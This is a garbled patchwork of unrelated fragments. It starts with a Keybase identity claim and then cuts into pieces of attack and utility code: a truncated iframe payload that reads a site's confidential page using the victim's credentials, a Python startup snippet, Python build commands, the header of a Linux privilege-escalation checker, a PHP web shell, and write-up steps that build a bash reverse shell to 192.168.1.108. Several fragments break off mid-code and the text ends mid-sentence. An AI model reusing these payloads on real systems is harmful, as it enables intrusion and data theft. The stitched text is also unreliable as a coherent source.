I hereby claim:
- I am avicoder on github.
- I am avicoder (https://keybase.io/avicoder) on keybase.
- I have a public key ASA5E3ToP1__j0WJ0hVsfEKPF-t9pWa1Ka31uZpGM32rawo
To claim this, I am signing this object:
<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
  if (xhr.readyState === xhr.DONE) {
    console.log(xhr.response);
  }
# Store this file in ~/.pystartup,
# set "export PYTHONSTARTUP=/home/user/.pystartup"
#
# Note that PYTHONSTARTUP does *not* expand "~", so you have to put in the
# full path to your home directory.
import atexit
import os
import readline
import rlcompleter
#!/usr/bin/env python
import sys
if __name__ == "__main__":
    if len(sys.argv) != 2:
        # Parenthesized form works under both Python 2 and Python 3
        print("usage: %s names.txt" % (sys.argv[0]))
        sys.exit(0)
    for line in open(sys.argv[1]):
        # Keep only letters and spaces from each input line
        name = ''.join([c for c in line if c == " " or c.isalpha()])
curl -OL http://www.python.org/ftp/python/2.7.11/Python-2.7.11.tgz
tar xzvf Python-2.7.11.tgz
cd Python-2.7.11
./configure --prefix=/usr/local --enable-shared
make
make install
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
<?php
system($_GET['cmd']);
?>
I faced an issue while executing any command using the .run command, as it doesn't support white spaces and raises an exception (for example, ls index.html).
I figured it out by creating a .sh file with a limited-privilege session (www-data) in the /html directory.
echo "#! bin/bash" > abc.sh
echo $'\n' >> abc.sh
echo "bash -i >& /dev/tcp/192.168.1.108/443 0>&1" >>abc.sh
chmod +x abc.sh
Now in hexchat execute: